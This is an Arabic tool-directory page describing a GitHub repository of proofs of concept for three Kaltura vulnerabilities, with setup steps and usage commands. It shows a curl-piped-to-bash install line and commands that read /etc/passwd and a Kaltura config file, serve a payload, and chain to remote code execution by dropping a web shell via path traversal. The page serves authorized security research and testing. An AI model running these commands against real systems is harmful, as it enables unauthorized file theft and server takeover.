Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-19912-CVE-2026-19913-CVE-2026-19914 — إثباتات مفهوم لاستغلالات CVE-2026-19912 وCVE-2026-19913 وCVE-2026-19914، توضح قراءة الملفات وتنفيذ الأكواد عن بُعد في Kaltura، مخصصة لاختبارات الأمان المصرح بها والأغراض التعليمية. | Kitploit
أدوات/GitHubGitHub/horkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubhorkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914

CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

إثباتات مفهوم لاستغلالات CVE-2026-19912 وCVE-2026-19913 وCVE-2026-19914، توضح قراءة الملفات وتنفيذ الأكواد عن بُعد في Kaltura، مخصصة لاختبارات الأمان المصرح بها والأغراض التعليمية.

عرض المستودع
منذ 8س 25دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-19912، CVE-2026-19913، CVE-2026-19914

تبرع

ساعد في صيانة هذا المشروع

إذا وجدت هذا المشروع مفيدًا، يرجى التفكير في دعم صيانته المستمرة عبر PayPal أو ABA Mobile.

❤️ ១០% នៃការបរិច្ចាគរបស់អ្នក នឹងត្រូវបានបរិច្ចាគជូនមន្ទីរពេទ្យគន្ធបុប្ផា។

❤️ عشرة بالمئة من كل تبرع يُساهم به إلى مستشفى كانتا بوفا للأطفال.

اختر طريقة الدفع

Donate securely with PayPal

ABA Mobile donation QR code
امسح باستخدام ABA Mobile · انقر للتكبير

⚡ الاستخدام البسيط

شغّل أحدث إصدار من سكربت التنزيل الخارجي مباشرة من GitHub:

root@kitploit:~
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)

يتطلب هذا الأمر Bash وcurl. راجع السكربت البعيد قبل تشغيله إذا كنت لا تثق بالمصدر.

استخدم هذا المشروع فقط في بيئات آمنة ومصرح بها مثل:

  • الأجهزة الافتراضية المحلية
  • حاويات Docker
  • إعدادات المختبرات المعزولة
  • بيئات اختبار الاختراق المصرح بها

مثال على الإعداد:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# المشروع يستخدم Python، اتبع ما يلي

# إنشاء بيئة افتراضية
python -m venv venv

# تفعيل البيئة الافتراضية

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# تثبيت المتطلبات
pip install -r requirements.txt

مثال على الاستخدام:

root@kitploit:~
# 1. قراءة الملف (الأكثر موثوقية، يعمل كما هو موضح في المقال)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
    -f /opt/kaltura/app/configurations/local.ini --try-versions

# 2. خادم الحمولة فقط (استخدمه مع Burp / curl يدويًا)
python3 kaltura_poc.py serve --lport 8888

# 3. هيكل السلسلة الكاملة
python3 kaltura_poc.py rce http://127.0.0.1 \
    --lhost 172.17.0.1 --lport 8888 \
    --payload stdclass \
    --shell '../../../../../../../../var/www/html/shell.php'

الإشادة أو المرجع

  • https://anddone-git.github.io/2026/one-parameter-two-bugs/

📚 مستودع أبحاث أمنية تعليمية

مستودع لتعلّم واختبار والبحث في مفاهيم الأمن السيبراني في بيئات خاضعة للتحكم.


⚠️ إخلاء المسؤولية الأمني والقانوني

الغرض

هذا المستودع مخصص للبحث الأمني التعليمي والمصرح به فقط.

صُمم لمساعدة المستخدمين على التعرف على:

  • الثغرات الأمنية
  • مفاهيم العزل والـ Sandbox
  • ممارسات البرمجة الآمنة والممارسات الدفاعية

الاستخدام المصرح به فقط

استخدم هذا المستودع فقط في بيئات لديك إذن باستخدامها، مثل:

  • المختبرات الشخصية أو الأجهزة الافتراضية
  • Docker أو البيئات المعزولة
  • اختبار الاختراق المصرح به
  • التدريب على الأمن السيبراني أو البحث الأكاديمي

الاستخدام غير المصرح به أو غير القانوني محظور تمامًا.


عدم وجود مسؤولية

المؤلف والمساهمون غير مسؤولين عن أي ضرر أو إساءة استخدام أو قضايا قانونية أو خسائر ناتجة عن هذا المشروع.

باستخدامك لهذا المستودع، فإنك توافق على أن:

  • أنت مسؤول عن أفعالك
  • ستستخدمه بشكل قانوني وأخلاقي
  • المشروع مُقدَّم بدون ضمان

الاستخدام الأخلاقي

هذا المشروع مخصص لـ:

  • البحث الأمني الدفاعي
  • التعليم في مجال الأمن السيبراني
  • التوعية بالثغرات
  • البحث في الأنظمة والبرمجيات الآمنة

يرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.


التواصل

للإفصاح المسؤول أو التعاون، تواصل مع مُشرف المستودع عبر GitHub.


مشروع ذو صلة

استكشف مجموعة PoC CVE للحصول على موارد إضافية لإثبات المفهوم (PoC) للثغرات، مخصصة للبحث الأمني المصرح به والتعليم.

تنزيل الأداة